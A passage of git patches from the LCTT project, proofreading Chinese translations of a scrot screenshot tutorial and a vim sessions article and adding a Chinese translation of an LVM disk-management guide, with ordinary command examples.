-现在假如我想抓取下层的终端窗口。这样我只要在执行命令后点击窗口就可以了 - 在你用鼠标点击之前,命令的执行不会结束。 +现在假如我想抓取下层的终端窗口。这样我只要在执行命令后点击窗口就可以了 —— 在你用鼠标点击之前,命令的执行不会结束。 这是我点击了下层终端窗口后的截图: @@ -107,9 +100,11 @@ scrot -s ### 在截屏时包含窗口边框 -我们之前介绍的 -u 选项在截屏时不会包含窗口边框。不过,需要的话你也可以在截屏时包含窗口边框。这个功能可以通过 -b 选项打开(当然要和 -u 选项一起)。 +我们之前介绍的 `-u` 选项在截屏时不会包含窗口边框。不过,需要的话你也可以在截屏时包含窗口边框。这个功能可以通过 `-b` 选项打开(当然要和 `-u` 选项一起)。 +``` scrot -ub +``` 下面是示例截图: @@ -121,11 +116,13 @@ scrot -ub ### 延时截屏 -你可以在开始截屏时增加一点延时。需要在 --delay 或 -d 选项后设定一个时间值参数。 +你可以在开始截屏时增加一点延时。需要在 `--delay` 或 `-d` 选项后设定一个时间值参数。 +``` scrot --delay [NUM] scrot --delay 5 +``` 例如: @@ -137,11 +134,13 @@ scrot --delay 5 ### 截屏前倒数 -这个工具也可以在你使用延时功能后显示一个倒计时。这个功能可以通过 -c 选项打开。 +这个工具也可以在你使用延时功能后显示一个倒计时。这个功能可以通过 `-c` 选项打开。 +``` scrot –delay [NUM] -c scrot -d 5 -c +``` 下面是示例截图: @@ -153,11 +152,13 @@ scrot -d 5 -c 你可以使用这个工具来调整截图的图片质量,范围是 1-100 之间。较大的值意味着更大的文件大小以及更低的压缩率。默认值是 75,不过最终效果根据选择的文件类型也会有一些差异。 -这个功能可以通过 --quality 或 -q 选项打开,但是你必须提供一个 1-100 之间的数值作为参数。 +这个功能可以通过 `--quality` 或 `-q` 选项打开,但是你必须提供一个 1 - 100 之间的数值作为参数。 +``` scrot –quality [NUM] scrot –quality 10 +``` 下面是示例截图: @@ -165,17 +166,19 @@ scrot –quality 10 ![截屏质量](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/img-quality.jpg) ][28] -你可以看到,-q 选项的参数更靠近 1 让图片质量下降了很多。 +你可以看到,`-q` 选项的参数更靠近 1 让图片质量下降了很多。 ### 生成缩略图 -scort 工具还可以生成截屏的缩略图。这个功能可以通过 --thumb 选项打开。这个选项也需要一个 NUM 数值作为参数,基本上是指定原图大小的百分比。 +scort 工具还可以生成截屏的缩略图。这个功能可以通过 `--thumb` 选项打开。这个选项也需要一个 NUM 数值作为参数,基本上是指定原图大小的百分比。 +``` scrot --thumb NUM scrot --thumb 50 +``` -**注意**:加上 --thumb 选项也会同时保存原始截图文件。 +**注意**:加上 `--thumb` 选项也会同时保存原始截图文件。 例如,下面是我测试的原始截图: @@ -191,9 +194,11 @@ scrot --thumb 50 ### 拼接多显示器截屏 -如果你的电脑接了多个显示设备,你可以用 scort 抓取并拼接这些显示设备的截图。这个功能可以通过 -m 选项打开。 +如果你的电脑接了多个显示设备,你可以用 scort 抓取并拼接这些显示设备的截图。这个功能可以通过 `-m` 选项打开。 +``` scrot -m +``` 下面是示例截图: @@ -203,9 +208,11 @@ scrot -m ### 在保存截图后执行操作 -使用这个工具,你可以在保存截图后执行各种操作 - 例如,用像 gThumb 这样的图片编辑器打开截图。这个功能可以通过 -e 选项打开。下面是例子: +使用这个工具,你可以在保存截图后执行各种操作 —— 例如,用像 gThumb 这样的图片编辑器打开截图。这个功能可以通过 `-e` 选项打开。下面是例子: -scrot abc.png -e ‘gthumb abc.png’ +``` +scrot abc.png -e 'gthumb abc.png' +``` 这个命令里的 gthumb 是一个图片编辑器,上面的命令在执行后会自动打开。 @@ -223,29 +230,33 @@ scrot abc.png -e ‘gthumb abc.png’ 你可以看到 scrot 抓取了屏幕截图,然后再启动了 gThumb 图片编辑器打开刚才保存的截图图片。 -如果你截图时没有指定文件名,截图将会用带有时间戳的文件名保存到当前目录 - 这是 scrot 的默认设定,我们前面已经说过。 +如果你截图时没有指定文件名,截图将会用带有时间戳的文件名保存到当前目录 —— 这是 scrot 的默认设定,我们前面已经说过。 -下面是一个使用默认名字并且加上 -e 选项来截图的例子: +下面是一个使用默认名字并且加上 `-e` 选项来截图的例子: -scrot -e ‘gthumb $n’ +``` +scrot -e 'gthumb $n' +``` [ ![scrot 截屏后运行 gthumb](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec3.png) ][34] -有个地方要注意的是 $n 是一个特殊字符串,用来获取当前截图的文件名。关于特殊字符串的更多细节,请继续看下个小节。 +有个地方要注意的是 `$n` 是一个特殊字符串,用来获取当前截图的文件名。关于特殊字符串的更多细节,请继续看下个小节。 ### 特殊字符串 -scrot 的 -e(或 --exec)选项和文件名参数可以使用格式说明符。有两种类型格式。第一种是以 '%' 加字母组成,用来表示日期和时间,第二种以 '$' 开头,scrot 内部使用。 +scrot 的 `-e`(或 `--exec`)选项和文件名参数可以使用格式说明符。有两种类型格式。第一种是以 `%` 加字母组成,用来表示日期和时间,第二种以 `$` 开头,scrot 内部使用。 -下面介绍几个 --exec 和文件名参数接受的说明符。 +下面介绍几个 `--exec` 和文件名参数接受的说明符。 -**$f** – 让你可以使用截图的全路径(包括文件名)。 +`$f` – 让你可以使用截图的全路径(包括文件名)。 -例如 +例如: +``` scrot ashu.jpg -e ‘mv $f ~/Pictures/Scrot/ashish/’ +``` 下面是示例截图: @@ -253,17 +264,19 @@ scrot ashu.jpg -e ‘mv $f ~/Pictures/Scrot/ashish/’ ![示例](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/f.png) ][35] -如果你没有指定文件名,scrot 默认会用日期格式的文件名保存截图。这个是 scrot 的默认文件名格式:%yy-%mm-%dd-%hhmmss_$wx$h_scrot.png。 +如果你没有指定文件名,scrot 默认会用日期格式的文件名保存截图。这个是 scrot 的默认文件名格式:`%yy-%mm-%dd-%hhmmss_$wx$h_scrot.png`。 -**$n** – 提供截图文件名。下面是示例截图: +`$n` – 提供截图文件名。下面是示例截图: [ ![scrot $n variable](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/n.png) ][36] -**$s** – 获取截图的文件大小。这个功能可以像下面这样使用。 +`$s` – 获取截图的文件大小。这个功能可以像下面这样使用。 +``` scrot abc.jpg -e ‘echo $s’ +``` 下面是示例截图: @@ -271,22 +284,19 @@ scrot abc.jpg -e ‘echo $s’ ![scrot $s 变量](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/s.png) ][37] -类似的,你也可以使用其他格式字符串 **$p**, **$w**, **$h**, **$t**, **$$** 以及 **\n** 来分别获取图片像素大小,图像宽度,图像高度,图像格式,输入 $ 字符,以及换行。你可以像上面介绍的 **$s** 格式那样使用这些字符串。 +类似的,你也可以使用其他格式字符串 `$p`、`$w`、 `$h`、`$t`、`$$` 以及 `\n` 来分别获取图片像素大小、图像宽度、图像高度、图像格式、输入 `$` 字符、以及换行。你可以像上面介绍的 `$s` 格式那样使用这些字符串。 ### 结论 这个应用能轻松地安装在 Ubuntu 系统上,对初学者比较友好。scrot 也提供了一些高级功能,比如支持格式化字符串,方便专业用户用脚本处理。当然,如果你想用起来的话有一点轻微的学习曲线。 - ![](https://www.howtoforge.com/images/pdficon_small.png) - [vie][16] - -------------------------------------------------------------------------------- via: https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/ 作者:[Himanshu Arora][a] 译者:[zpl1025](https://github.com/zpl1025) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 29d62751dd3511ce61617ac7481a82369d6943ca Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 5 Dec 2017 16:21:57 +0800 Subject: [PATCH 0303/1627] PRF&PUB:20170910 Cool vim feature sessions.md @geekpi https://linux.cn/article-9112-1.html --- translated/tech/20170910 Cool vim feature sessions.md | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/translated/tech/20170910 Cool vim feature sessions.md b/translated/tech/20170910 Cool vim feature sessions.md index 49ee43fda1..7855bc6ea0 100644 --- a/translated/tech/20170910 Cool vim feature sessions.md +++ b/translated/tech/20170910 Cool vim feature sessions.md @@ -1,5 +1,5 @@ vim 的酷功能:会话! -============================================================• +============================================================ 昨天我在编写我的[vimrc][5]的时候了解到一个很酷的 vim 功能!(主要为了添加 fzf 和 ripgrep 插件)。这是一个内置功能,不需要特别的插件。 @@ -17,9 +17,7 @@ vim 的酷功能:会话! 一些 vim 插件给 vim 会话添加了额外的功能: * [https://github.com/tpope/vim-obsession][1] - * [https://github.com/mhinz/vim-startify][2] - * [https://github.com/xolox/vim-session][3] 这是漫画: @@ -30,9 +28,9 @@ vim 的酷功能:会话! via: https://jvns.ca/blog/2017/09/10/vim-sessions/ -作者:[Julia Evans ][a] +作者:[Julia Evans][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 870b32c2959fc8e92ec0eee9e7a749878c72d0a7 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 5 Dec 2017 17:05:22 +0800 Subject: [PATCH 0304/1627] Translated by qhwdw --- ...sers guide to Logical Volume Management.md | 233 ------------------ ...sers guide to Logical Volume Management.md | 167 +++++++++++++ 2 files changed, 167 insertions(+), 233 deletions(-) delete mode 100644 sources/tech/20160922 A Linux users guide to Logical Volume Management.md create mode 100644 translated/tech/20160922 A Linux users guide to Logical Volume Management.md diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md deleted file mode 100644 index ff0e390f38..0000000000 --- a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md +++ /dev/null @@ -1,233 +0,0 @@ -A Linux user's guide to Logical Volume Management -============================================================ - -![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") -Image by : opensource.com - -Managing disk space has always been a significant task for sysadmins. Running out of disk space used to be the start of a long and complex series of tasks to increase the space available to a disk partition. It also required taking the system off-line. This usually involved installing a new hard drive, booting to recovery or single-user mode, creating a partition and a filesystem on the new hard drive, using temporary mount points to move the data from the too-small filesystem to the new, larger one, changing the content of the /etc/fstab file to reflect the correct device name for the new partition, and rebooting to remount the new filesystem on the correct mount point. - -I have to tell you that, when LVM (Logical Volume Manager) first made its appearance in Fedora Linux, I resisted it rather strongly. My initial reaction was that I did not need this additional layer of abstraction between me and the hard drives. It turns out that I was wrong, and that logical volume management is very useful. - -LVM allows for very flexible disk space management. It provides features like the ability to add disk space to a logical volume and its filesystem while that filesystem is mounted and active and it allows for the collection of multiple physical hard drives and partitions into a single volume group which can then be divided into logical volumes. - -The volume manager also allows reducing the amount of disk space allocated to a logical volume, but there are a couple requirements. First, the volume must be unmounted. Second, the filesystem itself must be reduced in size before the volume on which it resides can be reduced. - -It is important to note that the filesystem itself must allow resizing for this feature to work. The EXT2, 3, and 4 filesystems all allow both offline (unmounted) and online (mounted) resizing when increasing the size of a filesystem, and offline resizing when reducing the size. You should check the details of the filesystems you intend to use in order to verify whether they can be resized at all and especially whether they can be resized while online. - -### Expanding a filesystem on the fly - -I always like to run new distributions in a VirtualBox virtual machine for a few days or weeks to ensure that I will not run into any devastating problems when I start installing it on my production machines. One morning a couple years ago I started installing a newly released version of Fedora in a virtual machine on my primary workstation. I thought that I had enough disk space allocated to the host filesystem in which the VM was being installed. I did not. About a third of the way through the installation I ran out of space on that filesystem. Fortunately, VirtualBox detected the out-of-space condition and paused the virtual machine, and even displayed an error message indicating the exact cause of the problem. - -Note that this problem was not due to the fact that the virtual disk was too small, it was rather the logical volume on the host computer that was running out of space so that the virtual disk belonging to the virtual machine did not have enough space to expand on the host's logical volume. - -Since most modern distributions use Logical Volume Management by default, and I had some free space available on the volume group, I was able to assign additional disk space to the appropriate logical volume and then expand filesystem of the host on the fly. This means that I did not have to reformat the entire hard drive and reinstall the operating system or even reboot. I simply assigned some of the available space to the appropriate logical volume and resized the filesystem—all while the filesystem was on-line and the running program, The virtual machine was still using the host filesystem. After resizing the logical volume and the filesystem I resumed running the virtual machine and the installation continued as if no problems had occurred. - -Although this type of problem may never have happened to you, running out of disk space while a critical program is running has happened to many people. And while many programs, especially Windows programs, are not as well written and resilient as VirtualBox, Linux Logical Volume Management made it possible to recover without losing any data and without having to restart the time-consuming installation. - -### LVM Structure - -The structure of a Logical Volume Manager disk environment is illustrated by Figure 1, below. Logical Volume Management enables the combining of multiple individual hard drives and/or disk partitions into a single volume group (VG). That volume group can then be subdivided into logical volumes (LV) or used as a single large volume. Regular file systems, such as EXT3 or EXT4, can then be created on a logical volume. - -In Figure 1, two complete physical hard drives and one partition from a third hard drive have been combined into a single volume group. Two logical volumes have been created from the space in the volume group, and a filesystem, such as an EXT3 or EXT4 filesystem has been created on each of the two logical volumes. - -![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png) - - _Figure 1: LVM allows combining partitions and entire hard drives into Volume Groups._ - -Adding disk space to a host is fairly straightforward but, in my experience, is done relatively infrequently. The basic steps needed are listed below. You can either create an entirely new volume group or you can add the new space to an existing volume group and either expand an existing logical volume or create a new one. - -### Adding a new logical volume - -There are times when it is necessary to add a new logical volume to a host. For example, after noticing that the directory containing virtual disks for my VirtualBox virtual machines was filling up the /home filesystem, I decided to create a new logical volume in which to store the virtual machine data, including the virtual disks. This would free up a great deal of space in my /home filesystem and also allow me to manage the disk space for the VMs independently. - -The basic steps for adding a new logical volume are as follows. - -1. If necessary, install a new hard drive. - -2. Optional: Create a partition on the hard drive. - -3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. - -4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. - -5. Create a new logical volumes (LV) from the space in the volume group. - -6. Create a filesystem on the new logical volume. - -7. Add appropriate entries to /etc/fstab for mounting the filesystem. - -8. Mount the filesystem. - -Now for the details. The following sequence is taken from an example I used as a lab project when teaching about Linux filesystems. - -### Example - -This example shows how to use the CLI to extend an existing volume group to add more space to it, create a new logical volume in that space, and create a filesystem on the logical volume. This procedure can be performed on a running, mounted filesystem. - -WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. - -### Install hard drive - -If there is not enough space in the volume group on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive, and then perform the following steps. - -### Create Physical Volume from hard drive - -It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. - -``` -pvcreate /dev/hdd -``` - -It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. - -### Extend the existing Volume Group - -In this example we will extend an existing volume group rather than creating a new one; you can choose to do it either way. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example the existing Volume Group is named MyVG01. - -``` -vgextend /dev/MyVG01 /dev/hdd -``` - -### Create the Logical Volume - -First create the Logical Volume (LV) from existing free space within the Volume Group. The command below creates a LV with a size of 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. - -``` -lvcreate -L +50G --name Stuff MyVG01 -``` - -### Create the filesystem - -Creating the Logical Volume does not create the filesystem. That task must be performed separately. The command below creates an EXT4 filesystem that fits the newly created Logical Volume. - -``` -mkfs -t ext4 /dev/MyVG01/Stuff -``` - -### Add a filesystem label - -Adding a filesystem label makes it easy to identify the filesystem later in case of a crash or other disk related problems. - -``` -e2label /dev/MyVG01/Stuff Stuff -``` - -### Mount the filesystem - -At this point you can create a mount point, add an appropriate entry to the /etc/fstab file, and mount the filesystem. - -You should also check to verify the volume has been created correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. - -### Resizing a logical volume in an LVM filesystem - -The need to resize a filesystem has been around since the beginning of the first versions of Unix and has not gone away with Linux. It has gotten easier, however, with Logical Volume Management. - -1. If necessary, install a new hard drive. - -2. Optional: Create a partition on the hard drive. - -3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. - -4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. - -5. Create one or more logical volumes (LV) from the space in the volume group, or expand an existing logical volume with some or all of the new space in the volume group. - -6. If you created a new logical volume, create a filesystem on it. If adding space to an existing logical volume, use the resize2fs command to enlarge the filesystem to fill the space in the logical volume. - -7. Add appropriate entries to /etc/fstab for mounting the filesystem. - -8. Mount the filesystem. - -### Example - -This example describes how to resize an existing Logical Volume in an LVM environment using the CLI. It adds about 50GB of space to the /Stuff filesystem. This procedure can be used on a mounted, live filesystem only with the Linux 2.6 Kernel (and higher) and EXT3 and EXT4 filesystems. I do not recommend that you do so on any critical system, but it can be done and I have done so many times; even on the root (/) filesystem. Use your judgment. - -WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. - -### Install the hard drive - -If there is not enough space on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive and then perform the following steps. - -### Create a Physical Volume from the hard drive - -It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. - -``` -pvcreate /dev/hdd -``` - -It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. - -### Add PV to existing Volume Group - -For this example, we will use the new PV to extend an existing Volume Group. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example, the existing Volume Group is named MyVG01. - -``` -vgextend /dev/MyVG01 /dev/hdd -``` - -### Extend the Logical Volume - -Extend the Logical Volume (LV) from existing free space within the Volume Group. The command below expands the LV by 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. - -``` -lvextend -L +50G /dev/MyVG01/Stuff -``` - -### Expand the filesystem - -Extending the Logical Volume will also expand the filesystem if you use the -r option. If you do not use the -r option, that task must be performed separately. The command below resizes the filesystem to fit the newly resized Logical Volume. - -``` -resize2fs /dev/MyVG01/Stuff -``` - -You should check to verify the resizing has been performed correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. - -### Tips - -Over the years I have learned a few things that can make logical volume management even easier than it already is. Hopefully these tips can prove of some value to you. - -* Use the Extended file systems unless you have a clear reason to use another filesystem. Not all filesystems support resizing but EXT2, 3, and 4 do. The EXT filesystems are also very fast and efficient. In any event, they can be tuned by a knowledgeable sysadmin to meet the needs of most environments if the defaults tuning parameters do not. - -* Use meaningful volume and volume group names. - -* Use EXT filesystem labels. - -I know that, like me, many sysadmins have resisted the change to Logical Volume Management. I hope that this article will encourage you to at least try LVM. I am really glad that I did; my disk management tasks are much easier since I made the switch. - - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] - - David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][7][More about me][8] - --------------------------------------------------------------------------------- - -via: https://opensource.com/business/16/9/linux-users-guide-lvm - -作者:[ David Both][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/dboth -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/business/16/9/linux-users-guide-lvm?rate=79vf1js7A7rlp-I96YFneopUQqsa2SuB-g-og7eiF1U -[7]:https://opensource.com/users/dboth -[8]:https://opensource.com/users/dboth -[9]:https://opensource.com/user/14106/feed -[10]:https://opensource.com/users/dboth -[11]:https://opensource.com/users/dboth -[12]:https://opensource.com/users/dboth -[13]:https://opensource.com/business/16/9/linux-users-guide-lvm#comments -[14]:https://opensource.com/tags/business -[15]:https://opensource.com/tags/linux -[16]:https://opensource.com/tags/how-tos-and-tutorials -[17]:https://opensource.com/tags/sysadmin diff --git a/translated/tech/20160922 A Linux users guide to Logical Volume Management.md b/translated/tech/20160922 A Linux users guide to Logical Volume Management.md new file mode 100644 index 0000000000..18b42e9e69 --- /dev/null +++ b/translated/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -0,0 +1,167 @@ +Linux 用户的逻辑卷管理指南 +============================================================ + +![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") +Image by : opensource.com + +管理磁盘空间对系统管理员来说是一件重要的日常工作。因为磁盘空间耗尽而去启动一系列的耗时而又复杂的任务,来提升磁盘分区中可用的磁盘空间。它会要求系统离线。通常会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 /etc/fstab 文件内容去反映出新分区的正确设备名、以及重新引导去重新挂载新的文件系统到正确的挂载点。 + +我想告诉你的是,当 LVM (逻辑卷管理)首次出现在 Fedora Linux 中时,我是非常抗拒它的。我最初的反应是,我并不需要在我和我的设备之间有这种额外的抽象层。结果是我错了,逻辑卷管理是非常有用的。 + +LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷的单个卷组中。 + +卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须被减少。 + +有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3、和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。 + +### 在使用中扩展一个文件系统 + +在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在第三个安装时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。 + +请注意,这个问题并不是虚拟机磁盘太小造成的,而是由于宿主机上空间不足,导致虚拟机上的虚拟磁盘在宿主机上的逻辑卷中没有足够的空间去扩展。 + +因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后在使用中扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 — 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。 + +虽然这种问题你可能从来也没有遇到过,但是,许多人都遇到过重要程序在运行过程中发生磁盘空间不足的问题。而且,虽然许多程序,尤其是 Windows 程序,并不像 VirtualBox 一样写的很好,且富有弹性,Linux 逻辑卷管理可以使它在不丢失数据的情况下去恢复,也不需要去进行耗时的安装过程。 + +### LVM 结构 + +逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如EXT3 或者 EXT4,可以创建在一个逻辑卷上。 + +在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷,和一个文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。 + +![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png) + + _图 1: LVM 允许组合分区和整个硬盘到卷组中_ + +在一个主机上增加磁盘空间是非常简单的,在我的经历中,这种事情是很少的。下面列出了基本的步骤。你也可以创建一个完整的新卷组或者增加新的空间到一个已存在的逻辑卷中,或者创建一个新的逻辑卷。 + +### 增加一个新的逻辑卷 + +有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 /home 文件系统被填满时,我决定去创建一个新的逻辑卷,用于去存储虚拟机数据,包含虚拟磁盘。这将在我的 /home 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。 + +增加一个新的逻辑卷的基本步骤如下: + +1. 如有需要,安装一个新硬盘。 + +2. 可选 1: 在硬盘上创建一个分区 + +3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。 + +4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。 + +5. 从卷空间中创建一个新的逻辑卷(LV)。 + +6. 在新的逻辑卷中创建一个文件系统。 + +7. 在 /etc/fstab 中增加适当的条目以挂载文件系统。 + +8. 挂载文件系统。 + +为了更详细的介绍,接下来将使用一个示例作为一个实验去教授关于 Linux 文件系统的知识。 + +### 示例 + +这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行和挂载的文件系统上执行。 + +警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。 + +### 安装硬盘 + +如果在系统中现有硬盘上的卷组中没有足够的空间去增加,那么可能需要去增加一块新的硬盘,然后去创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。 + +### 从硬盘上创建物理卷 + +首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 /dev/hdd。 + +``` +pvcreate /dev/hdd +``` + +在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,以及另外的物理卷部分的元数据所使用的磁盘空间。 + +### 扩展已存在的卷组 + +在这个示例中,我将扩展一个已存在的卷组,而不是创建一个新的;你可以选择其它的方式。在物理磁盘已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。 + +``` +vgextend /dev/MyVG01 /dev/hdd +``` + +### 创建一个逻辑卷 + +首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。 + +``` +lvcreate -L +50G --name Stuff MyVG01 +``` + +### 创建文件系统 + +创建逻辑卷并不会创建文件系统。这个任务必须被单独执行。下面的命令在新创建的逻辑卷中创建了一个 EXT4 文件系统。 + +``` +mkfs -t ext4 /dev/MyVG01/Stuff +``` + +### 增加一个文件系统卷标 + +增加一个文件系统卷标,更易于在文件系统以后出现问题时识别它。 + +``` +e2label /dev/MyVG01/Stuff Stuff +``` + +### 挂载文件系统 + +在这个时候,你可以创建一个挂载点,并在 /etc/fstab 文件系统中添加合适的条目,以挂载文件系统。 + +你也可以去检查并校验创建的卷是否正确。你可以使用 **df**、**lvs**、和 **vgs** 命令去做这些工作。 + +### 提示 + +过去几年来,我学习了怎么去做让逻辑卷管理更加容易的一些知识,希望这些提示对你有价值。 + +* 除非你有一个明确的原因去使用其它的文件系统外,推荐使用可扩展的文件系统。除了 EXT2、3、和 4 外,并不是所有的文件系统都支持调整大小。EXT 文件系统不但速度快,而且它很高效。在任何情况下,如果默认的参数不能满足你的需要,它们(指的是文件系统参数)可以通过一位知识丰富的系统管理员来调优它。 + +* 使用有意义的卷和卷组名字。 + +* 使用 EXT 文件系统标签 + +我知道,像我一样,大多数的系统管理员都抗拒逻辑卷管理。我希望这篇文章能够鼓励你至少去尝试一个 